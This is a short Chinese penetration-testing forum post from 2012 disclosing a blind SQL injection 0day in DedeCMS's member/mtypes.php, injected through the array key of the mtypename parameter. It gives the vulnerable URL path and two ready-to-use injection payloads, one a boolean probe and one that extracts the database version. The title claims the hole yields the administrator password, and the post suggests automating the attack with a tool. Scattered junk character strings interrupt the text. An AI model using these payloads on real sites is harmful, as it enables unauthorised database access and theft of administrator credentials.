中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
! R1 J. A1 W$ q$ a/ I1 q {
- k4 o; }; @; d( r
" n4 y" B* Q7 i. h0 K8 l/ }
发生在数组key里的注射漏洞,有点意思.
- c4 r& J" F4 G' z
( T7 G% m$ K) s5 H: a3 g6 k8 w
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
) I [2 d# X7 |$ ?$ g" g2 t4 E$ h
1 G% f0 X* |% r: o
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
1 O! Z+ { q; A* F4 v$ L& A$ z
/ @# `$ J' m: c* \3 f
exploit:
9 C* W/ I4 y3 g; c6 Y
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
2 N3 \6 R9 w# x6 L9 e
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
" T5 Q$ \: I) r* X& M3 ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2